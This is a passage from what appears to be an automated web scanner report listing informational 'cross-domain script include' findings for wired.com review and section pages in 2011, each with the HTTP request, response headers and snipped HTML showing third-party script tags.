<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- /all in one seo pack -->
<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+a4b610ab9983549233daed020ecbd113d48ac015+1294843070"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.49. http://www.wired.com/reviews/category/digital-cameras-and-camcorders/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /reviews/category/digital-cameras-and-camcorders/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /reviews/category/digital-cameras-and-camcorders/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:27:36 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=446
Expires: Wed, 12 Jan 2011 15:44:21 GMT
Date: Wed, 12 Jan 2011 15:36:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- /all in one seo pack -->
<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+e73ce92b91cc87850f4defb338d49d014c7abf20+1294846055"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.50. http://www.wired.com/reviews/category/gaming-gear/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /reviews/category/gaming-gear/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /reviews/category/gaming-gear/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:36:44 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=424
Expires: Wed, 12 Jan 2011 15:44:01 GMT
Date: Wed, 12 Jan 2011 15:36:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- /all in one seo pack -->
<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+bc55cce9b1a8af3a2aaf8f8de044e321e5a7da1a+1294846603"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.51. http://www.wired.com/reviews/category/home-audio-and-video/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /reviews/category/home-audio-and-video/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /reviews/category/home-audio-and-video/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:42:06 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=393
Expires: Wed, 12 Jan 2011 15:43:30 GMT
Date: Wed, 12 Jan 2011 15:36:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- /all in one seo pack -->
<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+444a62150484244cb53b00a25beec5d3cb07d94d+1294843325"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.52. http://www.wired.com/reviews/category/household/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /reviews/category/household/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /reviews/category/household/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:37:54 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=463
Expires: Wed, 12 Jan 2011 15:44:41 GMT
Date: Wed, 12 Jan 2011 15:36:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 59509

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- /all in one seo pack -->
<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+e5e3f85d40f5cad8c437f0fae504d8638feb65f0+1294843073"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.53. http://www.wired.com/reviews/category/media-players/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /reviews/category/media-players/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /reviews/category/media-players/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:42:11 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=453
Expires: Wed, 12 Jan 2011 15:45:02 GMT
Date: Wed, 12 Jan 2011 15:37:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61823

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- /all in one seo pack -->
<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+bf6b9a5ec231191dfcb33e30e8f2f60ef546df09+1294843330"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.54. http://www.wired.com/reviews/category/mobile-audio/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /reviews/category/mobile-audio/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /reviews/category/mobile-audio/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/reviews/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 10:37:41 -0500
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Wed, 12 Jan 2011 15:45:41 GMT
Date: Wed, 12 Jan 2011 15:37:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61096

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- /all in one seo pack -->
<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+f903d00cb4002020d74f2b08e092ab0f7523b7ff+1294846660"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.55. http://www.wired.com/reviews/category/mobile-phones/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /reviews/category/mobile-phones/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /reviews/category/mobile-phones/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:15:55 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=476
Expires: Wed, 12 Jan 2011 15:45:37 GMT
Date: Wed, 12 Jan 2011 15:37:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- /all in one seo pack -->
<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+5adfe3154fe6860740d960e4d28725c620795551+1294845355"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.56. http://www.wired.com/reviews/category/notebooks-and-accessories/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /reviews/category/notebooks-and-accessories/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /reviews/category/notebooks-and-accessories/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:18:32 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=476
Expires: Wed, 12 Jan 2011 15:45:44 GMT
Date: Wed, 12 Jan 2011 15:37:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- /all in one seo pack -->
<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+0a3a1ce6ce95ad4ba51b2d03446fde0159ff8296+1294845512"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.57. http://www.wired.com/reviews/category/roundups/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /reviews/category/roundups/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /reviews/category/roundups/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:42:21 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=466
Expires: Wed, 12 Jan 2011 15:45:35 GMT
Date: Wed, 12 Jan 2011 15:37:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- /all in one seo pack -->
<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+47e844853076d7f854833c39c36b2b1326114536+1294843339"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.58. http://www.wired.com/reviews/category/software-and-apps/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /reviews/category/software-and-apps/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /reviews/category/software-and-apps/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:37:59 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=395
Expires: Wed, 12 Jan 2011 15:44:28 GMT
Date: Wed, 12 Jan 2011 15:37:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 48331

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- /all in one seo pack -->
<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+ef6220e1ac3b1e3ec4a5bcd3cd02936f2ee0b090+1294843079"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.59. http://www.wired.com/reviews/category/sports-and-outdoors/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /reviews/category/sports-and-outdoors/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /reviews/category/sports-and-outdoors/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:22:57 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=453
Expires: Wed, 12 Jan 2011 15:45:28 GMT
Date: Wed, 12 Jan 2011 15:37:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- /all in one seo pack -->
<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+117a50df36f46eee206de29c15cd64ddf42c0071+1294845776"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.60. http://www.wired.com/reviews/category/tablets-and-ebook-readers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /reviews/category/tablets-and-ebook-readers/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /reviews/category/tablets-and-ebook-readers/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:34:19 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:45:57 GMT
Date: Wed, 12 Jan 2011 15:37:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61446

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- /all in one seo pack -->
<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+4d7ad3afaeac65fdee5474407d148fb0ec694efc+1294846458"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.61. http://www.wired.com/reviews/category/televisions/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /reviews/category/televisions/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /reviews/category/televisions/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:37:59 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=436
Expires: Wed, 12 Jan 2011 15:45:14 GMT
Date: Wed, 12 Jan 2011 15:37:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60246

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- /all in one seo pack -->
<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+9668cd8773b5c7e6aa6df75a40ae2473948887df+1294843078"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.62. http://www.wired.com/science/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /science/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /science/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=337
Expires: Wed, 12 Jan 2011 15:43:37 GMT
Date: Wed, 12 Jan 2011 15:38:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 68746


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
</script>

<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<!-- close shell div -->


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.63. http://www.wired.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /search

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
